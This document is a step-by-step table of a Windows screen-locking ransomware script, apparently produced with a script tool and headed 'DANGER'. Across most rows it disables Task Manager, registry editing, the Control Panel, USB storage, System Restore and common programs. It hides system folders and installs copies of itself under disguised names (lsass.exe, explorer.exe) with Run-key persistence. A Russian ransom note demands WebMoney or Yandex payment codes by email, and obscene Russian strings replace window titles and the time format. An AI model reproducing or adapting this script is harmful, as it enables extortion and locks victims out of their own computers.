| # | Command | First parameter | Second parameter |
| 1 | N/A | N/A | |
| 2 | N/A | N/A | |
| 3 | Create registry key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer | N/A |
| 4 | Open registry key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer | N/A |
| 5 | Write binary data to registry | RestrictRun | Binary data [8 byte(s)] 0400000001000000 |
| 6 | Create registry key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\RestrictRun | N/A |
| 7 | Open registry key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\RestrictRun | N/A |
| 8 | Write string value to registry | 1 | thebat.exe |
| 9 | Write string value to registry | 2 | msimn.exe |
| 10 | Write string value to registry | 3 | iexplore.exe |
| 11 | Write string value to registry | 4 | MyIE.exe |
| 12 | Write string value to registry | 5 | Maxthon.exe |
| 13 | Write string value to registry | 6 | sbrowser.exe |
| 14 | Write string value to registry | 7 | absetup.exe |
| 15 | Write string value to registry | 8 | avant.exe |
| 16 | Write string value to registry | 9 | Photo.exe |
| 17 | Write string value to registry | 10 | notepad.exe |
| 18 | Write string value to registry | 11 | WinRAR.exe |
| 19 | Write string value to registry | 12 | WINZIP32.EXE |
| 20 | Create registry key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer | N/A |
| 21 | Open registry key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer | N/A |
| 22 | Write binary data to registry | RestrictRun | Binary data [8 byte(s)] 0400000001000000 |
| 23 | Create registry key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\RestrictRun | N/A |
| 24 | Open registry key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\RestrictRun | N/A |
| 25 | Write string value to registry | 1 | thebat.exe |
| 26 | Write string value to registry | 2 | msimn.exe |
| 27 | Write string value to registry | 3 | iexplore.exe |
| 28 | Write string value to registry | 4 | MyIE.exe |
| 29 | Write string value to registry | 5 | Maxthon.exe |
| 30 | Write string value to registry | 6 | sbrowser.exe |
| 31 | Write string value to registry | 7 | absetup.exe |
| 32 | Write string value to registry | 8 | avant.exe |
| 33 | Write string value to registry | 9 | Photo.exe |
| 34 | Write string value to registry | 10 | notepad.exe |
| 35 | Write string value to registry | 11 | WinRAR.exe |
| 36 | Write string value to registry | 12 | WINZIP32.EXE |
| 37 | Create registry key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\UsbStor | N/A |
| 38 | Open registry key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\UsbStor | N/A |
| 39 | Write binary data to registry | Start | Binary data [8 byte(s)] 0400000004000000 |
| 40 | Create directory | C:\DOS | N/A |
| 41 | Create registry key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3 | N/A |
| 42 | Open registry key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3 | N/A |
| 43 | Write binary data to registry | 1806 | Binary data [8 byte(s)] 0400000000000000 |
| 44 | Create registry key | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | N/A |
| 45 | Open registry key | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | N/A |
| 46 | Write binary data to registry | Start_ShowRun | Binary data [8 byte(s)] 0400000000000000 |
| 47 | Create registry key | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer | N/A |
| 48 | Open registry key | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer | N/A |
| 49 | Write binary data to registry | NoStartMenuMFUprogramsList | Binary data [8 byte(s)] 0400000001000000 |
| 50 | Write binary data to registry | NoStartMenuPinnedList | Binary data [8 byte(s)] 0400000001000000 |
| 51 | Write binary data to registry | NoStartMenuSubFolders | Binary data [8 byte(s)] 0400000001000000 |
| 52 | Write binary data to registry | NoCommonGroups | Binary data [8 byte(s)] 0400000001000000 |
| 53 | Write binary data to registry | NoSMMyPictures | Binary data [8 byte(s)] 0400000001000000 |
| 54 | Write binary data to registry | NoStartMenuMyMusic | Binary data [8 byte(s)] 0400000001000000 |
| 55 | Write binary data to registry | NoSMMyDocs | Binary data [8 byte(s)] 0400000001000000 |
| 56 | Write binary data to registry | NoDesktop | Binary data [8 byte(s)] 0400000001000000 |
| 57 | Write binary data to registry | NoActiveDesktop | Binary data [8 byte(s)] 0400000001000000 |
| 58 | Write binary data to registry | NoViewOnDrive | Binary data [8 byte(s)] 0400000001000000 |
| 59 | Create registry key | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main | N/A |
| 60 | Open registry key | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main | N/A |
| 61 | Write string value to registry | Start Page | http://poetry.rotten.com/uday/index22.html |
| 62 | Open registry key | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main | N/A |
| 63 | Write string value to registry | Window title | :::::::::::::::::: МОЙ ХУЙ СГНИЛ ПИЗДЕНЬ ПРОТУХЛА И В ЖОПЕ ПИЗДОРЕЗ :::::::::::::::::: |
| 64 | Write binary data to registry | NoControlPanel | Binary data [8 byte(s)] 0400000001000000 |
| 65 | Write numeric value to registry | NoDrives | 1044 |
| 66 | Write binary data to registry | NoRun | Binary data [8 byte(s)] 0400000001000000 |
| 67 | Write binary data to registry | NoFind | Binary data [8 byte(s)] 0400000001000000 |
| 68 | Write binary data to registry | NoFavoritesMenu | Binary data [8 byte(s)] 0400000001000000 |
| 69 | Write binary data to registry | NoRecentDocsMenu | Binary data [8 byte(s)] 0400000001000000 |
| 70 | Write binary data to registry | NoLogOff | Binary data [8 byte(s)] 0400000001000000 |
| 71 | Write binary data to registry | NoClose | Binary data [8 byte(s)] 0400000001000000 |
| 72 | Write binary data to registry | NoSaveSettings | Binary data [8 byte(s)] 0400000001000000 |
| 73 | Write binary data to registry | NoUserNameInStartMenu | Binary data [8 byte(s)] 0400000001000000 |
| 74 | Write binary data to registry | NoToolbarCustomize | Binary data [8 byte(s)] 0400000001000000 |
| 75 | Write binary data to registry | NoThemesTab | Binary data [8 byte(s)] 0400000001000000 |
| 76 | Write binary data to registry | NoSMHelp | Binary data [8 byte(s)] 0400000001000000 |
| 77 | Write binary data to registry | NoPrinterTabs | Binary data [8 byte(s)] 0400000001000000 |
| 78 | Write binary data to registry | NoPrinters | Binary data [8 byte(s)] 0400000001000000 |
| 79 | Write binary data to registry | NoNetHood | Binary data [8 byte(s)] 0400000001000000 |
| 80 | Write binary data to registry | NoManageMyComputerVerb | Binary data [8 byte(s)] 0400000001000000 |
| 81 | Create registry key | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System | N/A |
| 82 | Open registry key | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System | N/A |
| 83 | Write binary data to registry | DisableTaskMgr | Binary data [8 byte(s)] 0400000001000000 |
| 84 | Create registry key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System | N/A |
| 85 | Open registry key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System | N/A |
| 86 | Write binary data to registry | DisableTaskMgr | Binary data [8 byte(s)] 0400000001000000 |
| 87 | Create registry key | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System | N/A |
| 88 | Open registry key | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System | N/A |
| 89 | Write binary data to registry | DisableRegistryTools | Binary data [8 byte(s)] 0400000001000000 |
| 90 | Create registry key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System | N/A |
| 91 | Open registry key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System | N/A |
| 92 | Write binary data to registry | NoDispCPL | Binary data [8 byte(s)] 0400000001000000 |
| 93 | Create registry key | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer | N/A |
| 94 | Open registry key | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer | N/A |
| 95 | Write binary data to registry | NoViewContextMenu | Binary data [8 byte(s)] 0400000001000000 |
| 96 | Create registry key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\NameSpace\DelegateFolders\{59031a47-3f72-44a7-89c5-5595fe6b30ee} | N/A |
| 97 | Open registry key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\NameSpace\DelegateFolders\{59031a47-3f72-44a7-89c5-5595fe6b30ee} | N/A |
| 98 | Delete registry key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\NameSpace\DelegateFolders\{59031a47-3f72-44a7-89c5-5595fe6b30ee} | N/A |
| 99 | Create registry key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\lanmanserver\parameters | N/A |
| 100 | Open registry key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\lanmanserver\parameters | N/A |
| 101 | Write binary data to registry | DiskSpaceThreshold | Binary data [8 byte(s)] 0400000099000000 |
| 102 | Create registry key | HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Internet Explorer\Restrictions | N/A |
| 103 | Open registry key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Restrictions | N/A |
| 104 | Write binary data to registry | NoBrowserClose | Binary data [8 byte(s)] 0400000001000000 |
| 105 | Write binary data to registry | NoNavButtons | Binary data [8 byte(s)] 0400000001000000 |
| 106 | Write binary data to registry | NoSelectDownloadDir | Binary data [8 byte(s)] 0400000001000000 |
| 107 | Write binary data to registry | NoBrowserContextMenu | Binary data [8 byte(s)] 0400000001000000 |
| 108 | Write binary data to registry | NoBrowserOptions | Binary data [8 byte(s)] 0400000001000000 |
| 109 | Create registry key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Restrictions | N/A |
| 110 | Open registry key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Restrictions | N/A |
| 111 | Write binary data to registry | NoBrowserClose | Binary data [8 byte(s)] 0400000001000000 |
| 112 | Write binary data to registry | NoNavButtons | Binary data [8 byte(s)] 0400000001000000 |
| 113 | Write binary data to registry | NoSelectDownloadDir | Binary data [8 byte(s)] 0400000001000000 |
| 114 | Write binary data to registry | NoBrowserContextMenu | Binary data [8 byte(s)] 0400000001000000 |
| 115 | Write binary data to registry | NoBrowserOptions | Binary data [8 byte(s)] 0400000001000000 |
| 116 | Create registry key | HKEY_CURRENT_USER\Control Panel\Desktop | N/A |
| 117 | Open registry key | HKEY_CURRENT_USER\Control Panel\Desktop | N/A |
| 118 | Write string value to registry | WallpaperOriginX | -280 |
| 119 | Write string value to registry | WallpaperOriginY | -380 |
| 120 | Create registry key | HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main | N/A |
| 121 | Open registry key | HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main | N/A |
| 122 | Write string value to registry | Start Page | http://poetry.rotten.com/uday/index22.html |
| 123 | Write string value to registry | Window title | :::::::::::::::::: МОЙ ХУЙ СГНИЛ ПИЗДЕНЬ ПРОТУХЛА И В ЖОПЕ ПИЗДОРЕЗ :::::::::::::::::: |
| 124 | Create registry key | HKEY_CURRENT_USER\Control Panel\Desktop | N/A |
| 125 | Open registry key | HKEY_CURRENT_USER\Control Panel\Desktop | N/A |
| 126 | Write string value to registry | MenuShowDelay | 9999 |
| 127 | Create registry key | HKEY_CURRENT_USER\Control Panel\International | N/A |
| 128 | Open registry key | HKEY_CURRENT_USER\Control Panel\International | N/A |
| 129 | Write string value to registry | sTimeFormat | БЛЯДЬ |
| 130 | Create registry key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon | N/A |
| 131 | Open registry key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon | N/A |
| 132 | Write string value to registry | LegalNoticeCaption | DANGER |
| 133 | Write string value to registry | LegalNoticeText | Если ты хочешь восстановить нормальную работу своего компьютера не потеряв ВСЮ информацию! И с экономив деньги, пришли мне на e-mail wmcard@box.az номер и код авторизации карты пополнения счета WebMoney номиналом 10$ или 500 руб. Или Яндекс деньги на 500 руб. Вот три ссылочки, там ты можешь найти свой регион и город, где тебе удобнее купить карточку http://geo.webmoney.ru/aspx/GeoMain.aspx и http://www.guarantee.ru/Default.aspx?tabid=168 и http://money.yandex.ru/prepaid.xml После активации мной карты в ответ в течение суток в на свой e-mail ты получишь файл для удаления этой программы. |
| 134 | Create registry key | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon | N/A |
| 135 | Open registry key | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon | N/A |
| 136 | Write string value to registry | LegalNoticeCaption | DANGER |
| 137 | Write string value to registry | LegalNoticeText | Если ты хочешь восстановить нормальную работу своего компьютера не потеряв ВСЮ информацию! И с экономив деньги, пришли мне на e-mail wmcard@box.az номер и код авторизации карты пополнения счета WebMoney номиналом 10$ или 500 руб. Или Яндекс деньги на 500 руб. Вот три ссылочки, там ты можешь найти свой регион и город, где тебе удобнее купить карточку http://geo.webmoney.ru/aspx/GeoMain.aspx и http://www.guarantee.ru/Default.aspx?tabid=168 и http://money.yandex.ru/prepaid.xml После активации мной карты в ответ в течение суток в на свой e-mail ты получишь файл для удаления этой программы. |
| 138 | Create registry key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore | N/A |
| 139 | Open registry key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore | N/A |
| 140 | Write binary data to registry | DisableSR | Binary data [8 byte(s)] 0400000001000000 |
| 141 | Write binary data to registry | RPLifeInterval | Binary data [8 byte(s)] 0400000001000000 |
| 142 | Create registry key | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum | N/A |
| 143 | Open registry key | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum | N/A |
| 144 | Write binary data to registry | {20D04FE0-3AEA-1069-A2D8-08002B30309D} | Binary data [8 byte(s)] 0400000001000000 |
| 145 | Write binary data to registry | {450D8FBA-AD25-11D0-98A8-0800361B1103} | Binary data [8 byte(s)] 0400000001000000 |
| 146 | Create registry key | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Uninstall | N/A |
| 147 | Open registry key | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Uninstall | N/A |
| 148 | Write binary data to registry | NoAddRemovePrograms | Binary data [8 byte(s)] 0400000001000000 |
| 149 | Create registry key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer | N/A |
| 150 | Open registry key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer | N/A |
| 151 | Write binary data to registry | NoViewContextMenu | Binary data [8 byte(s)] 0400000001000000 |
| 152 | Create registry key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | N/A |
| 153 | Open registry key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | N/A |
| 154 | Write binary data to registry | Start_ShowRun | Binary data [8 byte(s)] 0400000000000000 |
| 155 | Create registry key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer | N/A |
| 156 | Open registry key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer | N/A |
| 157 | Write binary data to registry | NoStartMenuPinnedList | Binary data [8 byte(s)] 0400000001000000 |
| 158 | Write binary data to registry | NoStartMenuMFUprogramsList | Binary data [8 byte(s)] 0400000001000000 |
| 159 | Write binary data to registry | NoStartMenuSubFolders | Binary data [8 byte(s)] 0400000001000000 |
| 160 | Write binary data to registry | NoCommonGroups | Binary data [8 byte(s)] 0400000001000000 |
| 161 | Write binary data to registry | NoSMMyPictures | Binary data [8 byte(s)] 0400000001000000 |
| 162 | Write binary data to registry | NoStartMenuMyMusic | Binary data [8 byte(s)] 0400000001000000 |
| 163 | Write binary data to registry | NoSMMyDocs | Binary data [8 byte(s)] 0400000001000000 |
| 164 | Write binary data to registry | NoDesktop | Binary data [8 byte(s)] 0400000001000000 |
| 165 | Write binary data to registry | NoActiveDesktop | Binary data [8 byte(s)] 0400000001000000 |
| 166 | Write binary data to registry | NoViewOnDrive | Binary data [8 byte(s)] 0400000001000000 |
| 167 | Write binary data to registry | NoControlPanel | Binary data [8 byte(s)] 0400000001000000 |
| 168 | Write numeric value to registry | NoDrives | 1044 |
| 169 | Write binary data to registry | NoRun | Binary data [8 byte(s)] 0400000001000000 |
| 170 | Write binary data to registry | NoFind | Binary data [8 byte(s)] 0400000001000000 |
| 171 | Write binary data to registry | NoFavoritesMenu | Binary data [8 byte(s)] 0400000001000000 |
| 172 | Write binary data to registry | NoRecentDocsMenu | Binary data [8 byte(s)] 0400000001000000 |
| 173 | Write binary data to registry | NoLogOff | Binary data [8 byte(s)] 0400000001000000 |
| 174 | Write binary data to registry | NoClose | Binary data [8 byte(s)] 0400000001000000 |
| 175 | Write binary data to registry | NoSaveSettings | Binary data [8 byte(s)] 0400000001000000 |
| 176 | Write binary data to registry | NoUserNameInStartMenu | Binary data [8 byte(s)] 0400000001000000 |
| 177 | Write binary data to registry | NoToolbarCustomize | Binary data [8 byte(s)] 0400000001000000 |
| 178 | Write binary data to registry | NoThemesTab | Binary data [8 byte(s)] 0400000001000000 |
| 179 | Write binary data to registry | NoSMHelp | Binary data [8 byte(s)] 0400000001000000 |
| 180 | Write binary data to registry | NoPrinterTabs | Binary data [8 byte(s)] 0400000001000000 |
| 181 | Write binary data to registry | NoPrinters | Binary data [8 byte(s)] 0400000001000000 |
| 182 | Write binary data to registry | NoNetHood | Binary data [8 byte(s)] 0400000001000000 |
| 183 | Write binary data to registry | NoManageMyComputerVerb | Binary data [8 byte(s)] 0400000001000000 |
| 184 | Create registry key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum | N/A |
| 185 | Open registry key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum | N/A |
| 186 | Write binary data to registry | {20D04FE0-3AEA-1069-A2D8-08002B30309D} | Binary data [8 byte(s)] 0400000001000000 |
| 187 | Create registry key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Uninstall | N/A |
| 188 | Open registry key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Uninstall | N/A |
| 189 | Write binary data to registry | NoAddRemovePrograms | Binary data [8 byte(s)] 0400000001000000 |
| 190 | Create registry key | HKEY_USERS\S-1-5-21-1229272821-179605362-682003330-1003\Software\Microsoft\Windows\CurrentVersion\Policies\WinOldApp | N/A |
| 191 | Open registry key | HKEY_USERS\S-1-5-21-1229272821-179605362-682003330-1003\Software\Microsoft\Windows\CurrentVersion\Policies\WinOldApp | N/A |
| 192 | Write binary data to registry | Disabled | Binary data [8 byte(s)] 0400000001000000 |
| 193 | Write binary data to registry | NoRealMode | Binary data [8 byte(s)] 0400000001000000 |
| 194 | Create registry key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System | N/A |
| 195 | Open registry key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System | N/A |
| 196 | Write binary data to registry | DisableRegistryTools | Binary data [8 byte(s)] 0400000001000000 |
| 197 | Change file attributes | C:\Program Files | [+]..SH [-].... |
| 198 | Change file attributes | C:\WINDOWS | [+]..SH [-].... |
| 199 | Change file attributes | C:\Documents and Settings | [+]..SH [-].... |
| 200 | Create directory | C:\VISTA | N/A |
| 201 | Create directory | C:\WINDOWS\Provisioning\Schemas | N/A |
| 202 | Change file attributes | C:\WINDOWS\Provisioning\Schemas | [+]..SH [-].... |
| 203 | Copy file | Photo.exe | C:\WINDOWS\Provisioning\Schemas\lsass.exe |
| 204 | Change file attributes | C:\WINDOWS\Provisioning\Schemas\lsass.exe | [+]..SH [-].... |
| 205 | Create directory | C:\WINDOWS\WinSxS\Manifests | N/A |
| 206 | Change file attributes | C:\WINDOWS\WinSxS\Manifests | [+]..SH [-].... |
| 207 | Copy file | Photo.exe | C:\WINDOWS\WinSxS\Manifests\explorer.exe |
| 208 | Change file attributes | C:\WINDOWS\WinSxS\Manifests\explorer.exe | [+]..SH [-].... |
| 209 | Create registry key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run | N/A |
| 210 | Open registry key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run | N/A |
| 211 | Write string value to registry | System | C:\WINDOWS\Provisioning\Schemas\lsass.exe |
| 212 | Write string value to registry | explorer | C:\WINDOWS\WinSxS\Manifests\explorer.exe |
| 213 | Delete registry key | HKEY_CLASSES_ROOT\regfile\shell\open\command | N/A |
| 214 | Create registry key | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System | N/A |
| 215 | Open registry key | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System | N/A |
| 216 | Write binary data to registry | NoDispCPL | Binary data [8 byte(s)] 0400000001000000 |
| 217 | Show MessageBox | Где бы вы не скачали эту программу. Единственно верный e-mail адрес wmcard@box.az Не видитесь не на какие предлоги под которыми вас просят каким либо другим способом выйти на связь! Вы потеряете и ДЕНЬГИ И ВСЮ ИНФОРМАЦИЮ!!! Распространять мою программу может любой и писать тоже что угодно желая подзаработать. Но дать вам фаил удаления как и изменить настоящий e-mail указанный ТУТ wmcard@box.az могу только Я. Перезагрузите компьютер! И почитайте, что необходимо предпринять… | #40010 |
| 218 | Set new time | 20 hr 18 min 12.10.2020 | N/A |
| 219 | Terminate script if file closed | N/A | N/A |
| 220 | Terminate script | N/A | N/A |
Description:
Script header:!!! DANGER ПРОЧИТАЙ ЭТО ВАЖНО !!!
Program:
Protection:
Cracker:
Group:
Released:
Parameters: Generated by InqSoft Sign 0f Misery
"Invisible" (for other scripts) mode
Don't show running script window
Set script start directory as current